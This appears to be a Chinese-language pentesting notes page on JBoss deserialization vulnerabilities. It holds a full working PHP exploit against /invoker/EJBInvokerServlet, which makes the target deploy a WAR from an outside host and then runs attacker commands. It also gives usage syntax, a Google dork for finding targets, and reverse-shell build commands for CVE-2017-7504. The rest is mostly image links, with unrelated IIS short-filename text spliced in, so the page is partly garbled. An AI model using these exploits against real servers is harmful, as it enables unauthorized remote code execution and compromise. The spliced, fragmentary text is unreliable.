EJBInvokerServlet\u548cJMXInvokerServlet Servlet\u4e2d\u5b58\u5728\u4e00\u4e2a\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u3002\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u7279\u5236\u8bf7\u6c42\u5229\u7528\u6b64\u6f0f\u6d1e\u6765\u5b89\u88c5\u4efb\u610f\u5e94\u7528\u7a0b\u5e8f<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
\u5b9e\u9645\u4e0a\u4e3b\u8981\u96c6\u4e2d\u5728 jboss 6.x \u7248\u672c\u4e0a:<\/p>\n
Apache Group Commons Collections 4.0<\/p>\n
Apache Group Commons Collections 3.2.1<\/p>\n
Apache Group Commons Collections<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u8ddfCVE-2015-7501\u5229\u2f64\u2f45\u6cd5\u2f00\u6837\uff0c\u53ea\u662f\u8def\u5f84\u4e0d\u2f00\u6837\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u5229\u2f64\u8def\u5f84\u662f<\/p>\n
\/invoker\/EJBInvokerServlet<\/p>\n
<?php\n$host=gethostbyname($argv[1]);\n$port=$argv[2];\n$cmd=$argv[3];\n\/\/small jsp shell\n\/\/change this if you want, url to the app to be deployed, keep it short\n$url=\"http:\/\/retrogod.altervista.org\/a.war?\";\n$url_len=pack(\"n\",strlen($url));\nfunction hex_dump($data, $newline=\"n\") {\nstatic $from = '';\nstatic $to = '';\nstatic $width = 16; static $pad = '.';\nif ($from==='') {\nfor ($i=0; $i<=0xFF; $i++) {\n$from .= chr($i);\n$to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;\n}\n}\n$hex = str_split(bin2hex($data), $width*2);\n$chars = str_split(strtr($data, $from, $to), $width);\n$offset = 0;\nforeach ($hex as $i => $line) {\necho sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' .\n$chars[$i] . ']' . $newline;\n$offset += $width;\n}\n}\n$frag_i=\n\"xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73\". \/\/ ....sr.)\norg.jbos\n\"x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72\". \/\/ s.invoca\ntion.Mar\n\"x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f\". \/\/ shalledI\nnvocatio\n\"x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77\". \/\/ n...'A>.\n....xppw\n\"x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76\". \/\/ .x..G..S\n.sr..jav\n\"x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2\". \/\/ a.lang.I\nnteger..\n\"xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75\". \/\/ .....8..\n.I..valu\n\"x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e\". \/\/ exr..jav\na.lang.N\n\"x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00\". \/\/ umber...\n........\n\"x78x70x26x95xbex0ax73x72x00x24x6fx72x67x2ex6ax62\". \/\/ xp&...sr\n.$org.jb\n\"x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d\". \/\/ oss.invo\ncation.M\n\"x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc\". \/\/ arshalle\ndValue..\n\"xe0xd1xf4x4axd0x99x0cx00x00x78x70x77\";\n$frag_ii=\"x00\";\n$frag_iii=\n\"xacxedx00x05x75x72x00x13x5bx4cx6ax61x76x61x2e\". \/\/ .....ur. .\n[Ljava.\n\"x6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9f\". \/\/ lang.Obj\nect;..X.\n\"x10x73x29x6cx02x00x00x78x70x00x00x00x04x73x72x00\". \/\/ .s)l...x\np....sr.\n\"x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6dx65x6e\". \/\/ .javax.m\nanagemen\n\"x74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03xa7x1b\". \/\/ t.Object\nName....\n\"xebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62x6fx73\". \/\/ .m.....x\npt.!jbos\n\"x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69x63x65\". \/\/ s.system\n:service\n\"x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78x74x00\". \/\/ =MainDep\nloyerxt.\n\"x06x64x65x70x6cx6fx79x75x71x00x7ex00x00x00x00x00\". \/\/ .deployu\nq.~.....\n\"x01x74\".\n$url_len.\n$url.\n\"x75x72x00\".\n\"x13x5bx4cx6ax61x76x61x2ex6cx61\". \/\/ ur..[\nLjava.la\n\"x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1d\". \/\/ ng.Strin\ng;..V...\n\"x7bx47x02x00x00x78x70x00x00x00x01x74x00x10x6ax61\". \/\/ {G...xp.\n...t..ja\n\"x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67\";\n$frag_iv=\n\"x0dxd3\".\n\"xbexc9x78x77x04x00x00x00x01x73x72x00x22x6fx72x67\". \/\/ ..xw....\n.sr.\"org\n\"x2ex6ax62x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6f\". \/\/ .jboss.i\nnvocatio\n\"x6ex2ex49x6ex76x6fx63x61x74x69x6fx6ex4bx65x79xb8\". \/\/ n.Invoca\ntionKey.\n\"xfbx72x84xd7x93x85xf9x02x00x01x49x00x07x6fx72x64\". \/\/ .r......\n..I..ord\n\"x69x6ex61x6cx78x70x00x00x00x05x73x71x00x7ex00x05\". \/\/ inalxp..\n..sq.~..\n\"x77x0dx00x00x00x05xacxedx00x05x70xfbx57xa7xaax78\". \/\/ w.......\n..p.W..x\n\"x77x04x00x00x00x03x73x71x00x7ex00x07x00x00x00x04\". \/\/ w.....sq\n.~......\n\"x73x72x00x23x6fx72x67x2ex6ax62x6fx73x73x2ex69x6e\". \/\/ sr.#org.\njboss.in\n\"x76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61x74\". \/\/ vocation\n.Invocat\n\"x69x6fx6ex54x79x70x65x59xa7x3ax1cxa5x2bx7cxbfx02\". \/\/ ionTypeY\n.:..+|..\n\"x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00\". \/\/ ..I..ord\ninalxp..\n\"x00x01x73x71x00x7ex00x07x00x00x00x0ax70x74x00x0f\". \/\/ ..sq.~..\n....pt..\n\"x4ax4dx58x5fx4fx42x4ax45x43x54x5fx4ex41x4dx45x73\". \/\/ JMX_OBJE\nCT_NAMEs\n\"x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6d\". \/\/ r..javax\n.managem\n\"x65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03\". \/\/ ent.Obje\nctName..\n\"xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62\". \/\/ ...m....\n.xpt.!jb\n\"x6fx73x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69\". \/\/ oss.syst\nem:servi\n\"x63x65x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78\". \/\/ ce=MainD\neployerx\n\"x78\"; \/\/ x\n$data=$frag_i.pack(\"v\",strlen($frag_iii)+8).$frag_ii.pack(\"n\",strlen($frag_iii))\n.$frag_iii.$frag_iv;\n\/\/$pk=\"\"POST \/invoker\/JMXInvokerServlet\/ HTTP\/1.1rn\". \/\/the same ...\n$pk=\"POST \/invoker\/EJBInvokerServlet\/ HTTP\/1.1rn\".\n\"ContentType: application\/x-java-serialized-object;\nclass=org.jboss.invocation.MarshalledInvocationrn\".\n\"Accept-Encoding: x-gzip,x-deflate,gzip,deflatern\".\n\"User-Agent: Java\/1.6.0_21rn\".\n\"Host: \".$host.\":\".$port.\"rn\".\n\"Accept: text\/html, image\/gif, image\/jpeg, *; q=.2, *\/*; q=.2rn\".\n\"Connection: keep-alivern\".\n\"Content-type: application\/x-www-form-urlencodedrn\".\n\"Content-Length: \".strlen($data).\"rnrn\".\n$data;\n\/\/echo hex_dump($pk).\"n\";\n$fp=fsockopen($host,$port,$e,$err,3);\nfputs($fp,$pk);\n$out=fread($fp,8192);\nfclose($fp);\n\/\/echo hex_dump($out).\"n\";\nsleep(5);\n$pk=\"GET \/a\/pwn.jsp?cmd=\".urlencode($cmd).\" HTTP\/1.0rn\".\n\"Host: \".$host.\":\".$port.\"rn\".\n\"Connection: Closernrn\";\necho hex_dump($pk).\"n\";\n$fp=fsockopen($host,$port,$e,$err,3);\nfputs($fp,$pk);\n$out=\"\";\nwhile (!feof($fp)) {\n$out.=fread($fp,8192);\n}\nfclose($fp);\necho $out;\n?>#####################################################Google \u5173\u952e\u5b57: inurl:status\nEJBInvokerServlet \u5229\u7528\u65b9\u6cd5:C:PHP>php exp.php target_ip port\ncmd#####################################################\u53c2\u8003\uff1a\nhttp:\/\/www.hack80.com\/thread-21814-1-1.htmlhttps:\/\/www.exploit-\ndb.com\/exploits\/28713\/<\/code><\/pre>\n\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
\u5347\u7ea7<\/p>\n
5\u3001JBOSSMQ JMS CVE-2017-7504 \u96c6\u7fa4\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e 4.X<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
JBoss AS 4.x\u53ca\u4e4b\u524d\u7248\u672c\u4e2d\uff0cJbossMQ\u5b9e\u73b0\u8fc7\u7a0b\u7684JMS over HTTP Invocation Layer\u7684HTTPServerILServlet.java\u2f42\u4ef6\u5b58\u5728\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u501f\u52a9\u7279\u5236\u7684\u5e8f\u5217\u5316\u6570\u636e\u5229\u2f64\u8be5\u6f0f\u6d1e\u6267\u2f8f\u4efb\u610f\u4ee3\u7801<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
JBoss AS 4.x\u53ca\u4e4b\u524d\u7248\u672c<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
1\u3001\u9996\u5148\u9a8c\u8bc1\u76ee\u6807jboss\u662f\u5426\u5b58\u5728\u6b64\u6f0f\u6d1e,\u76f4\u63a5\u8bbf\u95ee<\/p>\n
\/jbossmq-httpil\/HTTPServerILServlet \u8def\u5f84\u4e0b\u3002\u82e5\u8bbf\u95ee200\uff0c\u5219\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e<\/p>\n
<\/p>\n
\u6b64\u5904\u6211\u4eec\u4f7f\u7528JavaDeserH2HC\u5de5\u5177\u6765\u5229\u7528\u8be5\u6f0f\u6d1e,\u5c1d\u8bd5\u76f4\u63a5\u5f39\u56de\u4e00\u4e2ashell<\/p>\n
javac -cp .:commons-collections-3.2.1.jar<\/p>\n
ReverseShellCommonsCollectionsHashMap.java<\/p>\n
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap \u53cd<\/p>\n
\u5f39\u7684IP:\u7aef\u53e3<\/p>\n
![\"1746496147067-f2b10200-9137-4ba5-88ac-20068a01c750.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf4c125e6.png\")
<\/p>\n![\"1746496154256-5d8fa104-e4b3-45bd-9975-fa85ed738b39.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf4f265b6.png\")
<\/p>\n![\"1746496274206-da0fb739-c9b9-4a55-a093-c160bbb55e62.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf5250a3d.png\")
<\/p>\n![\"1746496367591-2cf53f93-b3f7-42b6-b3d0-bf7157b829af.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf55b4555.png\")
<\/p>\n![\"1746496436836-423e43c2-24ef-4dcb-9621-afbe3c49665b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf581ed8c.png\")
<\/p>\n![\"1746496442375-bd263bda-c698-41d3-9d4f-66310ca45af1.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf5a7aed4.png\")
\u77ed\u6587\u4ef6\u540d\u7279\u5f81\uff1a<\/p>\n![\"1746496457137-3088f8b1-f203-4d24-a208-466dd56a114b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf5c5c6c6.png\")
<\/p>\n![\"1746496465386-a07c4103-c5da-4791-bfe6-4c70d588e61d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf5eca0c7.png\")
<\/p>\n![\"1746496473845-5e627f4f-ef0b-4ca7-884c-4e07ff024f49.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf617f4ae.png\")
5.\u957f\u6587\u4ef6\u540d\u524d\u7f00\/\u6587\u4ef6\u5939\u540d\u5b57\u7b26\u957f\u5ea6\u7b26\u54080-9\u548cA-Z\u3001a-z\u8303\u56f4\u4e14\u9700\u8981\u5927\u4e8e\u7b49\u4e8e9\u4f4d\u624d\u4f1a\u751f\u6210\u77ed\u6587\u4ef6\u540d,\u5982\u679c\u5305\u542b\u7a7a\u683c\u6216\u8005\u5176\u4ed6\u90e8\u5206\u7279\u6b8a\u5b57\u7b26,\u4e0d\u8bba\u957f\u5ea6\u5747\u4f1a\u751f\u6210\u77ed\u6587\u4ef6\u3002<\/p>\n![\"1746496485463-a846db33-3554-4542-96f1-80a5a144e73b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf6343db1.png\")
\u4f7f\u7528payload\u9a8c\u8bc1\u76ee\u6807\u662f\u5426\u5b58\u5728IIS\u77ed\u6587\u4ef6\u540d\u6f0f\u6d1e,\u4e0b\u56fe\u663e\u793a\u7684404,\u8bf4\u660e\u76ee\u6807\u5b58\u5728\u8be5\u77ed\u6587\u4ef6\u540d<\/p>\n![\"1746496505852-0866800c-38e0-4cab-87bd-80b8622ce57f.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf657c680.png\")
\u901a\u8fc7\u6d4f\u89c8\u5668\u8bbf\u95ee\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u77ed\u6587\u4ef6\u540d\uff0c\u4f1a\u8fd4\u56de400\u72b6\u6001\u7801, 400\u8bf4\u660e\u8be5\u6587\u4ef6\u4e0d\u5b58\u5728<\/p>\n![\"1746496519965-4cc1d97a-8d60-42c5-990e-4bd9ece52538.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf6827228.png\")
<\/p>\n![\"1746496540797-706d6589-878a-4d32-b46c-1c9a659af944.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf6a748bf.png\")
<\/p>\n![\"1746496545087-72afbfa5-606b-44ab-9217-04f12da3ac40.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf6d28f9b.png\")
<\/p>\n![\"1746496567157-6c2947b0-d667-40a4-834b-25625e7f1d70.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf6f91162.png\")
<\/p>\n![\"1746496577802-dc35ccc1-c0e7-4e58-a899-30ca782cadcb.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf722c9b0.png\")
<\/p>\n![\"1746496608397-49773336-23c1-43c0-b1c3-202bfaed1f38.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf7469c31.png\")
<\/p>\n![\"1746496632379-0bd0512c-cf1d-453b-a2a7-95f247d71846.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf772acab.png\")
<\/p>\n![\"1746496653287-03cad5a8-908e-4a90-bbc0-bdd383d64603.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf79bf38c.png\")
<\/p>\n![\"1746496717964-7e87a126-ddf7-4e9f-9254-ede4a9243e0b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf7ca2b03.png\")
<\/p>\n![\"1746496816191-72bf12f1-131f-417b-ace7-2bb41315b048.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf7ee2a43.png\")
<\/p>\n![\"1746496830074-5541a483-418c-4aaa-8b95-3195deef7d47.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf81da8c8.png\")
<\/p>\n![\"1746496889129-1926df75-c4ec-4524-a9ca-ddcd73e3b2ae.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf84d2528.png\")
<\/p>\n![\"1746496908631-317ef02a-ad0e-499e-b8c3-a92e9a75021a.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf87b6db5.png\")
<\/p>\n![\"1746497041136-3d56b447-4003-4f23-a12b-25c842fc6f82.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf8a7ef26.png\")
<\/p>\n![\"1746497045584-ba950424-9b0d-4fca-a461-e1383aafea7c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf8cbde23.png\")
<\/p>\n![\"1746497068884-179f1385-3c56-4cc6-98a1-f39f0f70c373.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf8ef349e.png\")
<\/p>\n![\"1746497086343-1a008156-7b1b-498b-aa91-738e7766ecab.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf923b8fa.png\")
<\/p>\n![\"1746497151993-a58470f6-9cd1-4ef7-964a-90c56d01dade.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf95026ba.png\")
<\/p>\n![\"1746497232467-3c0fc488-967c-43bc-80d2-e367441eeedd.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf978d243.png\")
<\/p>\n![\"1746497250816-2fd972e0-c44d-4f3a-acd0-fcdc7400b008.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf9a3e937.png\")
<\/p>\n![\"1746497434133-fa20f20f-7309-4529-b9ee-802cabae775b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf9d2d856.png\")
<\/p>\n![\"1746497439805-9a485a75-9f54-44ce-86fc-804c60fa4817.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfa07d744.png\")
\u628a2e\u6539\u62100a<\/p>\n![\"1746497463204-6ca3a24e-dc01-4b90-a431-19ee020990ab.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfa398363.png\")
<\/p>\n![\"1746497562492-41816793-f3c1-4fcc-9d88-1d5ec3798c2a.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfa6e68d1.png\")
<\/p>\n![\"1746497567111-a07b7664-8737-4cdc-9e01-df19087bb0cb.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfa9c42fc.png\")
<\/p>\n![\"1746497590443-e65e03dd-9152-4d9c-acc5-bd0e886bca5f.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfacccf41.png\")
<\/p>\n![\"1746497604503-7909d62e-357a-4023-80b7-e00cb79eb66f.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfaf7fb7e.png\")
<\/p>\n![\"1746497666620-88b11409-9c47-4794-a08a-7c8a7aa40671.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfb1c0e5e.png\")
<\/p>\n![\"1746497748824-baae06bc-8342-40dd-b7da-069b66febb06.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfb440ff6.png\")
<\/p>\n![\"1746497756689-4589146b-f3f6-41a1-b467-aa5e9554bd78.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfb6ae3f7.png\")
<\/p>\n![\"1746497765180-aa9ac904-2bf9-4bb7-90c8-38135020f5a3.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfb98c961.png\")
<\/p>\n![\"1746497793532-db2ae364-4613-4b20-9029-3ce67f081f59.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfbcbecd1.png\")
<\/p>\n![\"1746497803688-9c219e29-bc97-479a-888a-3bcd7f25e075.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfbfdbd9d.png\")
<\/p>\n![\"1746498012691-b1c01929-18b5-407b-8866-cc684e4b713a.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfc2d082a.png\")
<\/p>\n![\"1746498030614-f33bdc3f-d1bc-41d3-b881-aa5035b57364.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfc53120b.png\")
<\/p>\n![\"1746498083195-40209ee8-9ab2-4697-86b8-f5db5d229800.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfc77bdee.png\")
<\/p>\n![\"1746498087431-302e6024-c8c1-4101-b84c-d0e29274e72f.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfca6905f.png\")
<\/p>\n![\"1746498094772-b2f087ff-da4d-4a03-a12e-5b8d7523ec43.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfcc6efb2.png\")
<\/p>\n![\"1746498104622-08a9d214-d05a-400e-b38b-cdfb0722883b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfcea215a.png\")
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n![\"1746498136423-cea02552-0f1e-4d3d-aa2d-1e75c8fd6425.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfd138f1d.png\")
<\/p>\n![\"1746498572221-127a066f-6ba7-45f4-bc2d-f2151392986e.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfd3afb80.png\")
<\/p>\n![\"1746498606006-27ce46b2-3a2a-4ae1-a212-9ce1ba167df2.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfd63c8c2.png\")
<\/p>\n![\"1746498618886-440ca1db-ad8a-4575-b376-7a2f32253346.png\"](\".\/img\/4F_JLG9VC8wy9I_o\/1746498618886-440ca1db-ad8a-4575-b376-7a2f32253346-768246.png\")
![\"1746498622565-9f288be2-0e2f-4860-b882-6bc910b10c49.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfd96a427.png\")
<\/p>\n![\"1746498678222-d641ea0d-7b8f-4088-9956-d6affd8cbf4c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfdcaa847.png\")
<\/p>\n![\"1746498685487-2e0a2b68-a261-4315-b951-e1fec79686d5.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfe019c91.png\")
<\/p>\n![\"1746498692729-d6d23bd8-8ed4-422f-8cbb-9871d13d5b19.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfe3391f7.png\")
<\/p>\n![\"1746498697769-79d09f61-1a74-4ca8-9903-14e6e7839a59.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfe5a284e.png\")
<\/p>\n![\"1746498822788-7518ec93-fa70-4b5e-bcce-c357cd748482.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfe90c511.png\")
<\/p>\n![\"1746498931458-c45591fe-d326-4b84-b1fb-707b87ee38c2.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfebea736.png\")
<\/p>\n![\"1746498943060-f34a1dd3-8c8f-4704-8129-6b8d97a98138.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadfef069e2.png\")
<\/p>\n![\"1746498953011-c83fef9f-7c98-4a6a-af7e-67187d9ae89c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadff26bcfe.png\")
<\/p>\n![\"1746499083051-ad114069-d7c3-45ec-8d3b-deaa0f540ebc.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadff63ceb5.png\")
<\/p>\n![\"1746499560630-e9a75fcc-175e-4c2a-b38e-2d45ccdb2634.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadff93875a.png\")
<\/p>\n![\"1746499570251-f89028a9-274b-40f8-b12b-697b65740a83.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadffbe7126.png\")
<\/p>\n![\"1746499574519-795491a3-8e81-4e96-9716-af4b763d7b43.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadffecf983.png\")
<\/p>\n![\"1746499584765-62fdacbc-1c9d-432b-b839-fbd77a373db1.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae001abe29.png\")
<\/p>\n![\"1746499592736-2bcccc2f-2085-4e90-b3cf-41eb2caac253.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae00472e18.png\")
<\/p>\n![\"1746499599928-961a9480-96e9-4087-b4ad-d7890d823f98.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0074387b.png\")
<\/p>\n![\"1746499606399-ba62ffcb-bcd5-4cab-be38-e2aa55476480.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae009b03d0.png\")
<\/p>\n![\"1746499619324-b3e54919-d912-4f40-a248-02cdae4046cd.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae00c85f8b.png\")
<\/p>\n![\"1746499678799-1028a4c3-9705-43e9-b83f-707604681dee.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae01062580.png\")
<\/p>\n![\"1746499714806-d4c40614-5229-4201-bbe4-aa2360dfe47d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae013317cb.png\")
<\/p>\n![\"1746499776763-c7877597-8e5a-4c23-8864-536b25f29c9c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae015add98.png\")
<\/p>\n![\"1746499826001-53bbbcc1-a140-488a-b71e-3c936a432902.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae018770f1.png\")
<\/p>\n![\"1746499872362-9d453137-70a1-4409-b7f2-a1edd3e5b6d8.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae01b6eae9.png\")
<\/p>\n![\"1746499882184-ffbbbaf5-7ca6-44f5-8e68-1ec98e0eaade.png\"](\".\/img\/4F_JLG9VC8wy9I_o\/1746499882184-ffbbbaf5-7ca6-44f5-8e68-1ec98e0eaade-662248.png\")
![\"1746499887159-7cbe730a-75fb-42e2-b0ee-59de90804c17.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae01e3845c.png\")
<\/p>\n![\"1746499955408-659ed915-3b91-4e5a-8786-fd4ad742bb28.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae02113b4b.png\")
<\/p>\n![\"1746499966853-9136accd-20cf-4274-8489-5e8f3e3c89e5.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae023b21ed.png\")
<\/p>\n![\"1746499978837-78252d14-4280-4e7f-a22e-1ecf2a1dd85d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae026c325e.png\")
<\/p>\n![\"1746499999856-439a7e4d-1232-4b32-b119-c5171d23571d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae028e6ef8.png\")
<\/p>\n![\"1746500008869-b84bc8fb-d403-4d88-aaff-c6fd35d5c98c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae02bed147.png\")
<\/p>\n![\"1746500024778-66df794b-bc1a-400b-a91c-c0ec96fa89fa.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae02f2d5ff.png\")
<\/p>\n![\"1746500036181-57231104-6ebf-4a18-be60-61e2a84ae89f.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae031da936.png\")
<\/p>\n![\"1746500044591-4184064b-fedf-4aa4-ad43-ddd31b696a81.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0349ac80.png\")
<\/p>\n![\"1746500160207-dad7e0b7-b7a8-409e-add7-99b755481e1d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae037579d2.png\")
<\/p>\n![\"1746500181470-e225e93f-443e-4be6-8466-285328f6e110.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae03a3202c.png\")
<\/p>\n![\"1746500210185-7060eda0-e6a0-4d3b-b8c2-07eb30694775.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae03d0e722.png\")
\u4fee\u590d\u65b9\u6848<\/h3>\n![\"1746500346044-d050300e-8162-468e-8a31-1ed9b31365a5.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae03fe988a.png\")
